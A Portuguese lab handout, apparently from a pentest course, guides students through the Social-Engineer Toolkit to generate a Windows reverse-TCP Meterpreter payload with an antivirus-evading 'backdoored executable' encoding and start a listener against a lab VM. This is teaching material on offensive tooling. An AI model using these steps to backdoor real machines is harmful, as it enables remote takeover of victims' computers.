Adicionar à colecção (s) Adicionar a salvo
  1. Engenharia
  2. Ciência da computação
  3. Software em linguagem de montagem

Social Engineer Toolkit

Propaganda 
ESCALAÇÃO DE PRIVILÉGIO
EXPERIMENTO 3
SOCIAL-ENGINEER TOOLKIT (SET)
Neste experimento, é explorado o SET, um framework que inclui ferramentas que
permitem atacar ou testar um sistema-alvo, usando o ato de enganar ou ludibriar. A
ferramenta tornou-se um padrão, no arsenal do testador de penetração.
REQUISITOS
Os seguintes requisitos são necessários para este experimento:


Uma Backtrack VM ou Kali Linux onde SET está instalada.
Uma VM, máquina-alvo, com um endereço IP privado (192.168.x.x), para ser
submetida a um ataque de engenharia social.
COMO FAZER
Seja, explorar SET realizando as seguintes etapas:
1. Abra uma janela de terminal, no Backtrack ou Kali Linux, clicando sobre o ícone
Terminal e visitando o diretório contendo SET:
# cd /pentest/exploits/set
2. Executar a aplica;áo SET executando:
# ./set
3. Se for a primeira vez rodando SET, é necessário aceitar os termos de serviço,
por responder “yes” (y):
Veja a tela.
Do you agree to the terms of service [y/n]: y
4. Uma vez aceito, é apresentado o menu do SET, contendo as seguintes opções:
 Social-Engineering Attacks (1)






Fast-Track Penetration Testing (2)
Third Party Modules (3)
Update the Metasploit Framework (4)
Update the Social-Engineer Toolkit (5)
Update SET configuration (6)
Help, Credits and About (7)

Exit the Social-Engineer Toolkit (99)
Veja a tela.
“Antes de executar um ataque, é boa ideia atualizar o SET, quando as
atualizações vem de outros contribuidores” (opção 5).
5. Para nossos propósitos, escolhemos a opção 1, para lançar um ataque de
engenharia social.
set > 1
6. Veja a tela. Agora, é apresentada uma lista de ataques do SET.
Para este experimento, usaremos a opção Create a Payload and Listener (4).
set > 4
7. A seguir, é solicitado entrar o endereço IP para o payload para inverter a
conexão. Seja, por exemplo, 192.168.1.x , onde x é o endereço de uma
máquina, na rede 1, se usada a máscara de sub-rede 192.168.1.x/24.
Então:
set : payload > Enter the IP address for the payload (reverse): 192.168.1.x
8. Agora, é apresentada uma lista de payloads para gerar a opção, Payload and
Listener, bem como suas restrições. Escolha Windows Reverse_TCP
Meterpreter (opção 2). Isto permitirá conectar a nossa máquina-alvo e
executar o payload do Meterpreter.
Veja a tela. Escolha a opção 2.
set : payload > 2
9. Será apresentado, neste momento, uma lista de “encodings” para tentar e “by-
pass” pacotes de software de anti-vírus. SET fará uma sugestão para você , e
neste caso, SET recomendará ‘backdoored executable’. Escolha o “encoding”,
opção (16).
Veja a tela e indique (16) (Backdoored Executable).
set : encoding > 16
10. Finalmente, será solicitada uma porta para designar como a “listener port”.
Port 443 (HTTPS) está já escolhida para você e vamos nos ater com esta opção:
set : payloads > PORT of the listener [443] : 443
Veja a tela.
11. Uma vez qu o payload tenha sido completado, você necessita ser perguntado
para iniciar o listener:
set > Start the listener now? [yes|no]: yes
12. Você pode notar que o Metasploit abre um handler?
Veja a tela.
...
...
...
msf exploit(handler)> ...
CONCLUSÃO
Neste experimento, foi explorado o uso do SET. SET tem uma interface orientada à
menu que torna muito fácil gerar ferramentas que podem ser usadas para enganar
nossa vítima. Começamos por iniciar SET. Logo após, SET provê diversas escolhas de
exploits que podemos executar. Uma vez, escolhido o ataque, SET começa interagindo
com Metasploit, enquanto solicita ao usuário uma série de questões. Na conclusão
deste experimento, é criado um executável que nos proporcionará com uma sessão
ativa do Meterpreter para a máquina-alvo.
PERGUNTA FINAL
O que você conseguiu obter ???
MOSTRE SEU EXPERIMENTO
Postar no Moodle, na data desta aula prática, este arquivo constando o experimento
que você realizou.
Documentos relacionados
QF 531- Atividade em grupo Velocidade da reação entre tiossulfato
QF 531- Atividade em grupo Velocidade da reação entre tiossulfato
PPINT – Práticas de Programação Integrada
PPINT – Práticas de Programação Integrada
REGISTRO DE ATIVIDADES 20/05/2014 ST (Sem Tarefas). 6º ano
REGISTRO DE ATIVIDADES 20/05/2014 ST (Sem Tarefas). 6º ano
Disciplina: Física Série: 9º ano Prof.: Herbert J. Dias Período: Agosto
Disciplina: Física Série: 9º ano Prof.: Herbert J. Dias Período: Agosto
Professora: Ellen Liciane Barbosa. Disciplina: Biologia Turma: 1ºC
Professora: Ellen Liciane Barbosa. Disciplina: Biologia Turma: 1ºC
Nome da escola Setor de Química Teste em grupo – Vídeos de
Nome da escola Setor de Química Teste em grupo – Vídeos de
5-COMO ELABORAR UM RELATORIO DE AULA PRATICA
5-COMO ELABORAR UM RELATORIO DE AULA PRATICA
RelatorioExemplo - INPE
RelatorioExemplo - INPE
Relat´orio 3: Movimento Retilıneo Uniforme
Relat´orio 3: Movimento Retilıneo Uniforme
2 - CEUA
2 - CEUA
Roteiro de Mecânica
Roteiro de Mecânica
originalmente lançado
originalmente lançado
Exercício Adicional (Etapa 4) ()
Exercício Adicional (Etapa 4) ()
ecossistema -geralmente "de um"
ecossistema -geralmente "de um"
Lista de Treinamento: Cinética Química Q1. A equação química que
Lista de Treinamento: Cinética Química Q1. A equação química que
Exercício Adicional (Etapa 5) ()
Exercício Adicional (Etapa 5) ()
Usando Token de Personificação
Usando Token de Personificação
jpalmeida-prog3-aula-15-design-patterns-java
jpalmeida-prog3-aula-15-design-patterns-java
Tratamento de Eventos
Tratamento de Eventos
METASPLOIT: um cenário de intrusão
METASPLOIT: um cenário de intrusão
trabalho de redes de computadores 1
trabalho de redes de computadores 1
Especificação do Protocolo
Especificação do Protocolo
Download
Propaganda